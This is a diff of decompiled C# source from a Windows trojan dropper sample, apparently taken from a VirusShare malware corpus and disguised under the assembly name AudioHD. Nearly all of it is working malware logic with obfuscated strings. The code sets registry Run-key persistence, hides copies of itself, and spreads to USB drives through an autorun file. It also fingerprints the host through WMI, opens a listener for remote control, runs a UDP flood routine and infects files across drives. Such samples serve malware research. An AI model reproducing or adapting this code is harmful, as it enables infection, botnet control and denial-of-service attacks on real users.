+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000F;
+using Microsoft.Win32;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Timers;
+
+namespace \u000F
+{
+  internal sealed class \u0002
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private Timer \u0001 = new Timer();
+    private RegistryKey \u0001;
+    private string \u0001 = Process.GetCurrentProcess().MainModule.FileName;
+
+    public void \u000F()
+    {
+      this.\u0001.Interval = (double) (\u000F.\u0001.\u0001.\u0002 * 1000);
+      // ISSUE: method pointer
+      this.\u0001.Elapsed += new ElapsedEventHandler((object) this, __methodptr(\u000F));
+      this.\u0001.Start();
+    }
+
+    private void \u000F([In] object obj0, [In] ElapsedEventArgs obj1)
+    {
+      if (\u000F.\u0001.\u0001.\u0016)
+      {
+        try
+        {
+          this.\u0001 = Registry.LocalMachine.OpenSubKey(\u0002.\u0001(3792), true);
+          if (!this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[0]))
+            this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
+          else if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[0]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"')
+            this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
+        }
+        catch
+        {
+        }
+        try
+        {
+          this.\u0001 = Registry.LocalMachine.OpenSubKey(\u0002.\u0001(3853), true);
+          if (this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[1]))
+          {
+            if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[1]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"')
+              this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
+          }
+          else
+            this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
+        }
+        catch
+        {
+        }
+      }
+      else
+      {
+        try
+        {
+          this.\u0001 = Registry.CurrentUser.OpenSubKey(\u0002.\u0001(3792), true);
+          if (this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[0]))
+          {
+            if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[0]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"')
+              this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
+          }
+          else
+            this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
+        }
+        catch
+        {
+        }
+        try
+        {
+          this.\u0001 = Registry.CurrentUser.OpenSubKey(\u0002.\u0001(3853), true);
+          if (this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[1]))
+          {
+            if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[1]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"')
+              this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
+          }
+          else
+            this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
+        }
+        catch
+        {
+        }
+      }
+      try
+      {
+        foreach (string str in \u000F.\u0001.\u0001.\u0006)
+        {
+          if (!\u000F.\u0001.\u0001.\u0010(str))
+          {
+            File.Copy(this.\u0001, str, true);
+            File.SetAttributes(str, FileAttributes.Hidden);
+          }
+        }
+      }
+      catch
+      {
+      }
+    }
+
+    static \u0002() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0003.cs

@@ -0,0 +1,97 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using \u000F;
+using System;
+using System.Diagnostics;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u000F
+{
+  internal sealed class \u0003
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static int \u0001;
+    private static string \u0001;
+    private static \u000E.\u0008 \u0001;
+
+    public static void \u000F()
+    {
+      try
+      {
+        \u0003.\u0001 = new Random().Next(1000, 9999);
+        if (!\u0003.\u000F())
+          return;
+        TcpListener tcpListener = new TcpListener(\u0003.\u0001);
+        tcpListener.Start();
+        \u0003.\u0001.\u000F(\u0003.\u0001);
+        while (true)
+          new Thread(new ThreadStart(new \u0007(tcpListener.AcceptTcpClient()).\u000F)).Start();
+      }
+      catch (Exception ex)
+      {
+        \u0003.\u0001.\u0010(ex.ToString());
+      }
+    }
+
+    private static bool \u000F()
+    {
+      try
+      {
+        string str = \u0003.\u000F(\u0003.\u0001(8082) + \u0003.\u0001 + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(8087));
+        if (str.Contains(\u0003.\u0001(8096)))
+        {
+          \u0003.\u000F(\u0003.\u0001(8082) + \u0003.\u0001 + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(8087));
+          if (str.Contains(\u0003.\u0001(8096)))
+          {
+            System.IO.File.Delete(\u0003.\u0001(8113));
+            return true;
+          }
+          System.IO.File.Delete(\u0003.\u0001(8113));
+          return false;
+        }
+        System.IO.File.Delete(\u0003.\u0001(8113));
+        return false;
+      }
+      catch
+      {
+        System.IO.File.Delete(\u0003.\u0001(8113));
+        return false;
+      }
+    }
+
+    public static string \u000F() => Dns.GetHostByName(Dns.GetHostName()).AddressList[0].ToString();
+
+    public static string \u000F([In] string obj0)
+    {
+      Process process = new Process();
+      process.StartInfo = new ProcessStartInfo()
+      {
+        WindowStyle = ProcessWindowStyle.Hidden,
+        FileName = \u0003.\u0001(8113),
+        Arguments = obj0,
+        RedirectStandardOutput = true,
+        UseShellExecute = false,
+        CreateNoWindow = true
+      };
+      process.Start();
+      return process.StandardOutput.ReadToEnd();
+    }
+
+    static \u0003()
+    {
+      \u0003.\u000F();
+      \u0003.\u0001 = \u0003.\u000F();
+      \u0003.\u0001 = new \u000E.\u0008();
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0004.cs

@@ -0,0 +1,22 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u000F;
+using System.CodeDom.Compiler;
+using System.Configuration;
+using System.Runtime.CompilerServices;
+
+namespace \u000F
+{
+  [CompilerGenerated]
+  [GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
+  internal sealed class \u0004 : ApplicationSettingsBase
+  {
+    private static \u0004 \u0001 = (\u0004) SettingsBase.Synchronized((SettingsBase) new \u0004());
+
+    public static \u0004 Default => \u0004.\u0001;
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0005.cs

@@ -0,0 +1,93 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000F;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Management;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u000F
+{
+  internal sealed class \u0005
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static ManagementEventWatcher \u0001;
+
+    public static void \u000F()
+    {
+      ManagementScope scope = new ManagementScope(\u0005.\u0001(8131));
+      scope.Options.EnablePrivileges = true;
+      try
+      {
+        Thread.Sleep(50);
+        \u0005.\u0001 = new ManagementEventWatcher(scope, (EventQuery) new WqlEventQuery()
+        {
+          EventClassName = \u0005.\u0001(8148),
+          WithinInterval = new TimeSpan(0, 0, 3),
+          Condition = \u0005.\u0001(8181)
+        });
+        \u0005.\u0001.EventArrived += new EventArrivedEventHandler(\u0005.\u000F);
+        \u0005.\u0001.Start();
+      }
+      catch
+      {
+        if (\u0005.\u0001 == null)
+          return;
+        \u0005.\u0001.Stop();
+      }
+    }
+
+    public static void \u000F([In] object obj0, [In] EventArgs obj1)
+    {
+      foreach (DriveInfo drive in DriveInfo.GetDrives())
+      {
+        if (drive.DriveType == DriveType.Removable)
+        {
+          try
+          {
+            Thread.Sleep(50);
+            if (File.Exists(drive.Name + \u0005.\u0001(8246)))
+              File.Delete(drive.Name + \u0005.\u0001(8246));
+            if (File.Exists(drive.Name + \u0005.\u0001(8263)))
+              File.Delete(drive.Name + \u0005.\u0001(8263));
+          }
+          catch
+          {
+          }
+          StreamWriter streamWriter = new StreamWriter(drive.Name + \u0005.\u0001(8246));
+          streamWriter.WriteLine(\u0005.\u0001(8280));
+          streamWriter.WriteLine(\u0005.\u0001(8293));
+          streamWriter.WriteLine(\u0005.\u0001(8314));
+          streamWriter.WriteLine(\u0005.\u0001(8371));
+          streamWriter.WriteLine(\u0005.\u0001(8396));
+          streamWriter.WriteLine(\u0005.\u0001(8429));
+          streamWriter.Close();
+          Thread.Sleep(50);
+          File.SetAttributes(drive.Name + \u0005.\u0001(8246), File.GetAttributes(drive.Name + \u0005.\u0001(8246)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
+          try
+          {
+            File.Copy(Process.GetCurrentProcess().MainModule.FileName, drive.Name + \u0005.\u0001(8263));
+            File.SetAttributes(drive.Name + \u0005.\u0001(8263), File.GetAttributes(drive.Name + \u0005.\u0001(8263)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
+          }
+          finally
+          {
+            Thread.Sleep(2000);
+          }
+        }
+        if (\u0005.\u0001 != null)
+          \u0005.\u0001.Stop();
+        \u0005.\u0001.Start();
+      }
+    }
+
+    static \u0005() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0006.cs

@@ -0,0 +1,77 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000F;
+using Microsoft.Win32;
+using System;
+using System.Management;
+
+namespace \u000F
+{
+  internal sealed class \u0006
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+
+    public string \u000F() => this.\u0011() + (object) Convert.ToChar(32) + this.\u0012();
+
+    public string \u0010()
+    {
+      string str = (this.\u0013() + this.\u0015() + this.\u0014()).ToString();
+      return \u000F.\u0001.\u0001.\u0010(str);
+    }
+
+    private string \u0011()
+    {
+      ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u0006.\u0001(8133), \u0006.\u0001(8468));
+      string empty = string.Empty;
+      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
+        empty = Convert.ToString(managementBaseObject[\u0006.\u0001(6866)]);
+      try
+      {
+        string str = empty.Split('|')[0];
+        int length = str.Split(' ')[0].Length;
+        return str.Substring(length).TrimStart().TrimEnd();
+      }
+      catch
+      {
+        return \u0006.\u0001(8517);
+      }
+    }
+
+    private string \u0012() => Registry.LocalMachine.OpenSubKey(\u0006.\u0001(8538)).GetValue(\u0006.\u0001(8603)).ToString().Contains(\u0006.\u0001(8620)) ? \u0006.\u0001(8625) : \u0006.\u0001(8638);
+
+    private string \u0013()
+    {
+      ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u0006.\u0001(8133), \u0006.\u0001(8651));
+      string empty = string.Empty;
+      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
+        empty = Convert.ToString(managementBaseObject[\u0006.\u0001(8724)]);
+      return empty;
+    }
+
+    private string \u0014()
+    {
+      ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u0006.\u0001(8133), \u0006.\u0001(8741));
+      string empty = string.Empty;
+      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
+        empty = Convert.ToString(managementBaseObject[\u0006.\u0001(8782)]);
+      return empty;
+    }
+
+    public string \u0015()
+    {
+      ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u0006.\u0001(8133), \u0006.\u0001(8799));
+      string empty = string.Empty;
+      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
+        empty = Convert.ToString(managementBaseObject[\u0006.\u0001(8848)]);
+      return empty;
+    }
+
+    static \u0006() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0007.cs

@@ -0,0 +1,126 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u000F;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u000F
+{
+  internal sealed class \u0007
+  {
+    private static ThreadStart[] \u0001;
+    private static Thread[] \u0001;
+    public static string \u0001;
+    private static IPEndPoint \u0001;
+    public static ushort \u0001;
+    public static int \u0001;
+    private static \u0007.\u0001[] \u0001;
+    public static int \u0002;
+    public static int \u0003;
+    public static bool \u0001 = false;
+
+    public static void \u000F()
+    {
+      try
+      {
+        \u0007.\u0001 = new IPEndPoint(Dns.GetHostEntry(\u0007.\u0001).AddressList[0], (int) \u0007.\u0001);
+      }
+      catch
+      {
+        \u0007.\u0001 = new IPEndPoint(IPAddress.Parse(\u0007.\u0001), (int) \u0007.\u0001);
+      }
+      \u0007.\u0001 = new Thread[\u0007.\u0002];
+      \u0007.\u0001 = new ThreadStart[\u0007.\u0002];
+      \u0007.\u0001 = new \u0007.\u0001[\u0007.\u0002];
+      for (int index = 0; index < \u0007.\u0002; ++index)
+      {
+        \u0007.\u0001[index] = new \u0007.\u0001(\u0007.\u0001, \u0007.\u0003, \u0007.\u0001);
+        \u0007.\u0001[index] = new ThreadStart(\u0007.\u0001[index].\u000F);
+        \u0007.\u0001[index] = new Thread(\u0007.\u0001[index]);
+        \u0007.\u0001[index].Start();
+      }
+      \u0007.\u0001 = true;
+    }
+
+    public static void \u0010()
+    {
+      for (int index = 0; index < \u0007.\u0002; ++index)
+      {
+        try
+        {
+          \u0007.\u0001[index].Abort();
+          \u0007.\u0001[index].Join();
+        }
+        catch
+        {
+          \u0007.\u0001 = false;
+        }
+      }
+      \u0007.\u0001 = false;
+    }
+
+    private sealed class \u0001
+    {
+      private IPEndPoint \u0001;
+      private int \u0001;
+      private Socket[] \u0001;
+      private int \u0002;
+
+      public \u0001([In] IPEndPoint obj0, [In] int obj1, [In] int obj2)
+      {
+        this.\u0001 = obj0;
+        this.\u0002 = obj1;
+        this.\u0001 = obj2;
+      }
+
+      public void \u000F()
+      {
+        while (true)
+        {
+          byte[] buffer = new byte[this.\u0001];
+          try
+          {
+            this.\u0001 = new Socket[this.\u0002];
+            for (int index = 0; index < this.\u0002; ++index)
+            {
+              this.\u0001[index] = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
+              this.\u0001[index].Blocking = false;
+              this.\u0001[index].SendTo(buffer, (EndPoint) this.\u0001);
+            }
+            Thread.Sleep(100);
+            for (int index = 0; index < this.\u0002; ++index)
+            {
+              if (this.\u0001[index].Connected)
+                this.\u0001[index].Disconnect(false);
+              this.\u0001[index].Close();
+              this.\u0001[index] = (Socket) null;
+            }
+            this.\u0001 = (Socket[]) null;
+          }
+          catch
+          {
+            for (int index = 0; index < this.\u0002; ++index)
+            {
+              try
+              {
+                if (this.\u0001[index].Connected)
+                  this.\u0001[index].Disconnect(false);
+                this.\u0001[index].Close();
+                this.\u0001[index] = (Socket) null;
+              }
+              catch
+              {
+              }
+            }
+          }
+        }
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0008.cs

@@ -0,0 +1,83 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000F;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace \u000F
+{
+  internal sealed class \u0008
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    public static int \u0001;
+    private static string \u0001;
+    private static string \u0002;
+
+    [DllImport("kernel32.dll", EntryPoint = "GetShortPathName", CharSet = CharSet.Auto)]
+    public static extern int \u000F([MarshalAs(UnmanagedType.LPTStr)] string path, [MarshalAs(UnmanagedType.LPTStr)] StringBuilder shortPath, [In] int obj2);
+
+    private static void \u000F([In] string obj0)
+    {
+      foreach (string file in Directory.GetFiles(obj0))
+      {
+        if (file.Contains(\u0008.\u0001(8880)))
+          \u0008.\u0011(file);
+        if (file.Contains(\u0008.\u0001(8889)))
+          \u0008.\u0011(file);
+      }
+      foreach (string directory in Directory.GetDirectories(obj0))
+        \u0008.\u000F(directory);
+    }
+
+    public static void \u0010([In] string obj0)
+    {
+      \u0008.\u0002 = obj0;
+      foreach (string logicalDrive in Environment.GetLogicalDrives())
+        \u0008.\u000F(logicalDrive);
+    }
+
+    public static void \u0011([In] string obj0)
+    {
+      string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
+      string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf(\u0008.\u0001(2016))), string.Empty) + \u0008.\u0001(2016);
+      \u0008.\u0001 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0008.\u0001(8898);
+      if (!File.Exists(\u0008.\u0001))
+        return;
+      if (!File.Exists(Path.Combine(path1, \u0008.\u0002)))
+        File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, \u0008.\u0002));
+      StringBuilder shortPath1 = new StringBuilder((int) byte.MaxValue);
+      \u0008.\u000F(Path.Combine(path1, \u0008.\u0002), shortPath1, shortPath1.Capacity);
+      string str1 = shortPath1.ToString();
+      StringBuilder shortPath2 = new StringBuilder((int) byte.MaxValue);
+      \u0008.\u000F(obj0, shortPath2, shortPath2.Capacity);
+      try
+      {
+        ProcessStartInfo startInfo = new ProcessStartInfo();
+        string str2 = \u0008.\u0001(8923) + (object) shortPath2 + \u0008.\u0001(1448) + str1;
+        startInfo.FileName = \u0008.\u0001;
+        startInfo.Arguments = str2;
+        startInfo.WindowStyle = ProcessWindowStyle.Hidden;
+        Process.Start(startInfo);
+        ++\u0008.\u0001;
+      }
+      catch
+      {
+      }
+    }
+
+    static \u0008()
+    {
+      \u0003.\u000F();
+      \u0008.\u0001 = 0;
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0010/Token200007D.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token200007D
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0010
+{
+  internal class Token200007D : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0010/_0001.cs

@@ -0,0 +1,17 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Collections.Generic;
+using System.Runtime.CompilerServices;
+
+namespace \u0010
+{
+  [CompilerGenerated]
+  internal sealed class \u0001
+  {
+    internal static Dictionary<string, int> \u0001;
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_003CModule_003E.cs

@@ -0,0 +1,18 @@
+// Decompiled with JetBrains decompiler
+// Type: <Module>
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0002;
+
+internal class \u003CModule\u003E
+{
+  static \u003CModule\u003E()
+  {
+    \u0003.\u000F();
+    \u0005.\u000F();
+    \u0001.\u0001.\u0010();
+  }
+}